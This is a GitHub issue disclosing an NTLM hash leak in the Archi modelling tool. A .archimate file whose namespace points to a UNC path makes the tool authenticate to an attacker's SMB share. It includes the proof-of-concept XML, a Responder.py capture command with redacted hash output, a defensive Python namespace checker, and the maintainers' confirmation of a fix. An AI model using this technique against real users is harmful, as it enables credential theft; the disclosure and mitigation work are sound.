NTLM Hash Disclosure (v5.0.2) #946

Closed
ncsc-pt opened this issue Jul 14, 2023 · 4 comments

Comments

@ncsc-pt

ncsc-pt commented Jul 14, 2023

Version of Archi

5.0.2

Description

When parsing the XMLNS value of an archimate project file, if the namespace does not match the expected archimate URL, the parser will access the provided resource. If the provided resource is a UNC path pointing to a share server that does not accept guest accounts, the host will try to authenticate to the share using the current user's session.

Impact

A malicious user can capture the NTLM hash of the authenticated user running the application. With the captured hashes, offline password cracking can be performed in order to guess the password and gain unauthorized access to the server.

Technical fix

Do not allow the application’s functionality to resolve or load UNC paths.

Technical Details

“archimate” projects are saved as XML files using the extension .archimate. The example below is an archimate project with a single BusinessActor element (John Doe) present in the “Business” folder. That element is placed on the diagram “Default View” (linked by the ID e79145c...).

<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="http://www.archimatetool.com/archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
  <folder name="Strategy" id="id-2ab87f8808194aafb76570f1480511a1" type="strategy"/>
  <folder name="Business" id="id-2e5d95fb12be42589b1e494dfc79dd2a" type="business">
    <element xsi:type="archimate:BusinessActor" name="John Doe" id="id-e79145cce35a4704a19ba22885cfc9d2"/>
  </folder>
  <folder name="Application" id="id-53a1acc2e38c4d7db125ccd25dc6892d" type="application"/>
  <folder name="Technology &amp; Physical" id="id-24c7dc79bf11478ea65391ef16835543" type="technology"/>
  <folder name="Motivation" id="id-dc391a764cd141d389af3b3b4a81a94a" type="motivation"/>
  <folder name="Implementation &amp; Migration" id="id-90400d4328f448779016a63ad6eab713" type="implementation_migration"/>
  <folder name="Other" id="id-276cb2473edf4874a5854257ed930166" type="other"/>
  <folder name="Relations" id="id-8a1f3df198fa44c7b271f846e4fa1d12" type="relations"/>
  <folder name="Views" id="id-bdcce9aa0bb64f4386ebc4ef4a90fa1b" type="diagrams">
    <element xsi:type="archimate:ArchimateDiagramModel" name="Default View" id="id-fb6015c3baa2446d90238f15a70a5adb">
      <child xsi:type="archimate:DiagramObject" id="id-be3e6f080b904e2496cf1d89f8965c15" archimateElement="id-e79145cce35a4704a19ba22885cfc9d2">
        <bounds x="571" y="332" width="120" height="55"/>
      </child>
    </element>
  </folder>
</archimate:model>

The xmlns:archimate is pointing to http://www.archimatetool.com/archimate. However, if the value is modified, the parser will try to access the resource, and if a UNC path is provided, the host will try to access the share drive and, if need be, try to authenticate.

In the following example, the attacker is running the Responder tool (Responder.py) listening on the interface 172.16.227.1. The archimate project file is modified so that the xmlns:archimate is pointing to \\172.16.227.1\share\archimate.

<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:archimate="\\172.16.227.1\share\archimate" name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
[...]

Whenever the victim opens the modified file, the application will try to access the resource via the host and authenticate to the fake SMB share created by Responder.py.

sudo ./Responder.py -I vmnet8
[...]
[+] Listening for events...
[...]
[SMB] NTLMv2-SSP Client: 172.16.227.169
[SMB] NTLMv2-SSP Username : LAB\tester
[SMB] NTLMv2-SSP Hash:
test::LAB:xxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxx[...]

As seen in the output above, the NTLM hash is leaked and could be used to crack the user's password.
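As an added example (not part of the report above, and not Archi's or EMF's own code): a pre-load check in Python that lists every xmlns declaration in an .archimate file without resolving any of them, and flags namespace URIs that are not the ones a legitimate Archi model declares, in particular UNC paths. It illustrates the mitigation the report asks for (refuse to resolve or load UNC paths) as a gate in front of the real loader. The two sample models are constructed from the report's example file; the EXPECTED_NAMESPACES table, the function names and the "treat everything else as suspicious" policy are assumptions of this example, not Archi's behaviour.

```python
"""Pre-load check for .archimate files (added example, not Archi/EMF code).

Lists every xmlns declaration in a model file without resolving any of them,
and flags namespace URIs that are not the ones a legitimate Archi model
declares, in particular UNC paths (\\\\host\\share\\...) that would make a
resolver on Windows open an SMB connection and authenticate as the user.
"""
import io
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Namespaces declared by the legitimate model in the report above.
# Assumption of this example: anything else is treated as suspicious.
EXPECTED_NAMESPACES = {
    "archimate": "http://www.archimatetool.com/archimate",
    "xsi": "http://www.w3.org/2001/XMLSchema-instance",
}


@dataclass
class NamespaceFinding:
    prefix: str
    uri: str
    verdict: str  # "ok", "unc-path" or "unexpected-uri"


def is_unc_path(value: str) -> bool:
    """True for \\\\host\\share, //host/share and file://host/share forms,
    all of which Windows may turn into an SMB connection to `host`."""
    v = value.strip().lower()
    if v.startswith("\\\\") or v.startswith("//"):
        return True
    if v.startswith("file:"):
        rest = v[len("file:"):]
        # file://host/share and file:////host/share both carry a host part;
        # file:///C:/dir and file:///tmp/dir do not.
        if rest.startswith("//"):
            rest = rest[2:]
        if rest.startswith("//"):
            rest = rest[2:]
        host = rest.split("/", 1)[0]
        return bool(host) and host != "localhost"
    return False


def classify_namespace(prefix: str, uri: str) -> str:
    """Exact match against the expected table is the only "ok" outcome."""
    if EXPECTED_NAMESPACES.get(prefix) == uri:
        return "ok"
    if is_unc_path(uri):
        return "unc-path"
    return "unexpected-uri"


def scan_archimate(xml_text: str) -> list[NamespaceFinding]:
    """Collect every xmlns declaration via the parser's start-ns events.

    ElementTree reports each (prefix, uri) pair as plain strings and never
    opens the URI, so this scan itself makes no network or file access.
    """
    findings = []
    source = io.BytesIO(xml_text.encode("utf-8"))
    for _event, (prefix, uri) in ET.iterparse(source, events=("start-ns",)):
        findings.append(NamespaceFinding(prefix, uri, classify_namespace(prefix, uri)))
    return findings


def is_safe_to_open(xml_text: str) -> bool:
    """Gate: hand the file to the real loader only if every namespace is expected."""
    return all(f.verdict == "ok" for f in scan_archimate(xml_text))


# Constructed sample input, trimmed from the report's example model.
BENIGN_MODEL = """<?xml version="1.0" encoding="UTF-8"?>
<archimate:model xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns:archimate="http://www.archimatetool.com/archimate"
    name="(new model)" id="id-81d2dc112d96489ea22c7f336df894cd" version="5.0.0">
  <folder name="Business" id="id-2e5d95fb12be42589b1e494dfc79dd2a" type="business">
    <element xsi:type="archimate:BusinessActor" name="John Doe" id="id-e79145cce35a4704a19ba22885cfc9d2"/>
  </folder>
</archimate:model>
"""

# Same file with the namespace URI swapped for the UNC path used in the report.
MALICIOUS_MODEL = BENIGN_MODEL.replace(
    "http://www.archimatetool.com/archimate", r"\\172.16.227.1\share\archimate"
)


if __name__ == "__main__":
    for label, model in (("benign", BENIGN_MODEL), ("malicious", MALICIOUS_MODEL)):
        print(f"{label}: safe={is_safe_to_open(model)}")
        for f in scan_archimate(model):
            print(f"  xmlns:{f.prefix} = {f.uri!r} -> {f.verdict}")
```

The check is deliberately an allow-list rather than a UNC deny-list: the SMB trigger is only one way an unexpected namespace URI can be abused by a resolver, so anything that is not the known Archi and XSI namespaces is rejected, and the UNC classification only serves to label the finding.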

@Phillipus (Member)

Thanks for the report. This is under investigation.

See eclipse-emf/org.eclipse.emf#8

@Phillipus (Member)

This will be addressed in the next version of Archi.

Thanks.

@Phillipus (Member)

Fixed in Archi 5.1 beta 2.

@ncsc-pt (Author)

ncsc-pt commented Jul 18, 2023

Thanks for the quick response! 💪

@ncsc-pt ncsc-pt closed this as completed Jul 18, 2023